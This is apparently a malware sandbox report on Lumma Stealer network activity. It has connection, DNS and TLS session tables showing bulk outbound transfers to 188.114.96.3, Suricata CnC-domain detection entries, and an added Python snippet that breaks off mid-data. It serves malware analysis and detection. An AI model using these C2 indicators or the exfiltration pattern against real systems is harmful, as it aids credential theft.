Jan 14, 2025 08:27:15.093800068 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093836069 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.093842030 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.139151096 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.139183998 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.182701111 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.182786942 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.182804108 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.182965040 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.183028936 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.183036089 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.183130026 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.183185101 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.183260918 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.183278084 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.183293104 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.183300018 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.259371996 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.259443045 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.259522915 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.259901047 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.259915113 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.727472067 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.727636099 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.931159973 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.931222916 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.931700945 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.935005903 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.935162067 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.935195923 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.935256004 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.935267925 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.163667917 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.163770914 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.163899899 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.164046049 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.164076090 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.182648897 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.182696104 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.182790041 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.183168888 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.183178902 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.658905029 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.659035921 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.660507917 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.660521984 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.660743952 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:17.668788910 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.668927908 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:17.668943882 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:18.480849981 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:18.481098890 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:18.481194973 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:18.481254101 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:18.481276989 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:18.556162119 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:18.556216955 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:18.556282997 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:18.556704998 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:18.556725979 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.021635056 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.021811962 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.023178101 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.023204088 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.023607969 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.024904013 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.025190115 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.025233030 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.025324106 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.025336027 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.638278961 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.638382912 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.638552904 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.638761997 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.638780117 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.818252087 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.818305016 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:19.818382025 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.818726063 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:19.818738937 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:20.288928032 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:20.289083958 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:20.290602922 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:20.290622950 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:20.290887117 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:20.292576075 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:20.292689085 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:20.292700052 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:21.333800077 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:21.333913088 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:21.334022999 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:21.334233046 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:21.334259033 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:21.681433916 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:21.681528091 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:21.681701899 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:21.681955099 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:21.681972027 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:22.160110950 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:22.160237074 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:22.162250996 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:22.162266970 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:22.162581921 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:22.164169073 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:22.164400101 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:22.164428949 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:22.164531946 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:22.164560080 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:22.164673090 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:22.164714098 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:22.164840937 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:22.164871931 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:22.164967060 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:22.164988041 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.371710062 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.371819019 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.371893883 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.372198105 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.372225046 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.378184080 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.378249884 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.378324032 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.378642082 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.378657103 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.845788956 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.845891953 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.847424030 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.847443104 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.847768068 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:24.849092007 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.849128962 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:24.849200964 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:25.345873117 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:25.345995903 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:25.346074104 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:25.346295118 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:25.346326113 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:25.346338987 CET | 49748 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:25.346344948 CET | 443 | 49748 | 188.114.96.3 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 08:27:11.792084932 CET | 49447 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.801541090 CET | 53 | 49447 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.805855036 CET | 58984 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.814053059 CET | 53 | 58984 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.817677021 CET | 60549 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.826939106 CET | 53 | 60549 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.830324888 CET | 56901 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.838896036 CET | 53 | 56901 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.848565102 CET | 60048 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.857649088 CET | 53 | 60048 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.877254963 CET | 64720 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.886056900 CET | 53 | 64720 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.893390894 CET | 60715 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.901957989 CET | 53 | 60715 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.905812025 CET | 54093 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.915172100 CET | 53 | 54093 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.927906036 CET | 53855 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.938083887 CET | 53 | 53855 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:11.943125963 CET | 58421 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:11.949949980 CET | 53 | 58421 | 1.1.1.1 | 192.168.2.4 |
Jan 14, 2025 08:27:13.327888012 CET | 53741 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 14, 2025 08:27:13.335834026 CET | 53 | 53741 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 14, 2025 08:27:11.792084932 CET | 192.168.2.4 | 1.1.1.1 | 0x1c10 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.805855036 CET | 192.168.2.4 | 1.1.1.1 | 0x8741 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.817677021 CET | 192.168.2.4 | 1.1.1.1 | 0x353c | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.830324888 CET | 192.168.2.4 | 1.1.1.1 | 0x5352 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.848565102 CET | 192.168.2.4 | 1.1.1.1 | 0xbebd | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.877254963 CET | 192.168.2.4 | 1.1.1.1 | 0x4a9d | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.893390894 CET | 192.168.2.4 | 1.1.1.1 | 0x2250 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.905812025 CET | 192.168.2.4 | 1.1.1.1 | 0xb2e8 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.927906036 CET | 192.168.2.4 | 1.1.1.1 | 0x221f | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.943125963 CET | 192.168.2.4 | 1.1.1.1 | 0x501a | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:13.327888012 CET | 192.168.2.4 | 1.1.1.1 | 0x26a6 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 14, 2025 08:27:11.801541090 CET | 1.1.1.1 | 192.168.2.4 | 0x1c10 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.814053059 CET | 1.1.1.1 | 192.168.2.4 | 0x8741 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.826939106 CET | 1.1.1.1 | 192.168.2.4 | 0x353c | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.838896036 CET | 1.1.1.1 | 192.168.2.4 | 0x5352 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.857649088 CET | 1.1.1.1 | 192.168.2.4 | 0xbebd | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.886056900 CET | 1.1.1.1 | 192.168.2.4 | 0x4a9d | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.901957989 CET | 1.1.1.1 | 192.168.2.4 | 0x2250 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.915172100 CET | 1.1.1.1 | 192.168.2.4 | 0xb2e8 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.938083887 CET | 1.1.1.1 | 192.168.2.4 | 0x221f | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:11.949949980 CET | 1.1.1.1 | 192.168.2.4 | 0x501a | No error (0) | | | 104.102.49.254 | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:13.335834026 CET | 1.1.1.1 | 192.168.2.4 | 0x26a6 | No error (0) | | | 188.114.96.3 | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 08:27:13.335834026 CET | 1.1.1.1 | 192.168.2.4 | 0x26a6 | No error (0) | | | 188.114.97.3 | A (IP address) | IN (0x0001) | false |

The queried names did not survive extraction (the Name column is empty in both DNS tables). Eight of the nine NXDOMAIN queries can still be identified: their timestamps match, to the microsecond, the eight ET MALWARE CnC-domain alerts in the Suricata table above. The two lookups that did resolve are the ones followed by TLS sessions to 104.102.49.254 and 188.114.96.3.
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:12 UTC | 219 | OUT | |
2025-01-14 07:27:13 UTC | 1905 | IN | |
2025-01-14 07:27:13 UTC | 14479 | IN | |
2025-01-14 07:27:13 UTC | 16384 | IN | |
2025-01-14 07:27:13 UTC | 3768 | IN | |
2025-01-14 07:27:13 UTC | 510 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:13 UTC | 266 | OUT | |
2025-01-14 07:27:13 UTC | 8 | OUT | |
2025-01-14 07:27:14 UTC | 1127 | IN | |
2025-01-14 07:27:14 UTC | 7 | IN | |
2025-01-14 07:27:14 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:14 UTC | 267 | OUT | |
2025-01-14 07:27:14 UTC | 49 | OUT | |
2025-01-14 07:27:15 UTC | 1131 | IN | |
2025-01-14 07:27:15 UTC | 238 | IN | |
2025-01-14 07:27:15 UTC | 1369 | IN | |
2025-01-14 07:27:15 UTC | 1369 | IN | |
2025-01-14 07:27:15 UTC | 1369 | IN | |
2025-01-14 07:27:15 UTC | 1369 | IN | |
2025-01-14 07:27:15 UTC | 1369 | IN | |
2025-01-14 07:27:15 UTC | 1369 | IN | |
2025-01-14 07:27:15 UTC | 1369 | IN | |
2025-01-14 07:27:15 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:15 UTC | 275 | OUT | |
2025-01-14 07:27:15 UTC | 15331 | OUT | |
2025-01-14 07:27:15 UTC | 2774 | OUT | |
2025-01-14 07:27:17 UTC | 1130 | IN | |
2025-01-14 07:27:17 UTC | 20 | IN | |
2025-01-14 07:27:17 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:17 UTC | 277 | OUT | |
2025-01-14 07:27:17 UTC | 8744 | OUT | |
2025-01-14 07:27:18 UTC | 1123 | IN | |
2025-01-14 07:27:18 UTC | 20 | IN | |
2025-01-14 07:27:18 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:19 UTC | 278 | OUT | |
2025-01-14 07:27:19 UTC | 15331 | OUT | |
2025-01-14 07:27:19 UTC | 5066 | OUT | |
2025-01-14 07:27:19 UTC | 1139 | IN | |
2025-01-14 07:27:19 UTC | 20 | IN | |
2025-01-14 07:27:19 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:20 UTC | 282 | OUT | |
2025-01-14 07:27:20 UTC | 1387 | OUT | |
2025-01-14 07:27:21 UTC | 1131 | IN | |
2025-01-14 07:27:21 UTC | 20 | IN | |
2025-01-14 07:27:21 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49745 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:22 UTC | 279 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:22 UTC | 15331 | OUT | |
2025-01-14 07:27:24 UTC | 1138 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | 7608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 07:27:24 UTC | 267 | OUT | |
2025-01-14 07:27:24 UTC | 84 | OUT | |
2025-01-14 07:27:25 UTC | 1129 | IN | |
2025-01-14 07:27:25 UTC | 54 | IN | |
2025-01-14 07:27:25 UTC | 5 | IN |
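Read together, the DNS and session tables give the loader's contact pattern: nine A lookups answered NXDOMAIN (eight matched by the ET Lumma CnC-domain rules), then one lookup resolving to 104.102.49.254 whose TLS session is tagged as a Steam profile lookup, then a lookup resolving to 188.114.96.3 / 188.114.97.3 followed by check-in, activity and exfiltration alerts against 188.114.96.3. The session tables add what the signatures do not: sessions 3, 5 and 7 each push 15,331-byte records to 188.114.96.3 (session 7 sends ten of them, 153,589 bytes out against 1,138 in) while only the severity-3 JA3 rule fires on those three sessions; the one session the ruleset tags as exfiltration (4, port 49740) is the smallest of the four that send more than 5 KB. The roughly 270-byte first record out and 1,1xx-byte first record in on every session are consistent with the TLS handshake, so the application data is what follows them. The example below is added here and is not part of the report: it re-keys the 24 alert rows and the nine session tables as constructed inline data and joins them by client port, so the volume-based check can be run beside the signature hits. SIDs, ports and byte counts are copied from the tables; the 10,000-byte threshold and the function names are mine.

```python
import re
from collections import defaultdict

# The 24 Suricata rows from the report's alert table (trailing pipes dropped).
ALERTS = """\
2025-01-14T08:27:11.805855+0100 | 2059189 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) | 1 | 192.168.2.4 | 58984 | 1.1.1.1 | 53 | UDP
2025-01-14T08:27:11.817677+0100 | 2059211 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) | 1 | 192.168.2.4 | 60549 | 1.1.1.1 | 53 | UDP
2025-01-14T08:27:11.830325+0100 | 2059201 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) | 1 | 192.168.2.4 | 56901 | 1.1.1.1 | 53 | UDP
2025-01-14T08:27:11.848565+0100 | 2059203 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) | 1 | 192.168.2.4 | 60048 | 1.1.1.1 | 53 | UDP
2025-01-14T08:27:11.877255+0100 | 2059199 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) | 1 | 192.168.2.4 | 64720 | 1.1.1.1 | 53 | UDP
2025-01-14T08:27:11.893391+0100 | 2059207 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) | 1 | 192.168.2.4 | 60715 | 1.1.1.1 | 53 | UDP
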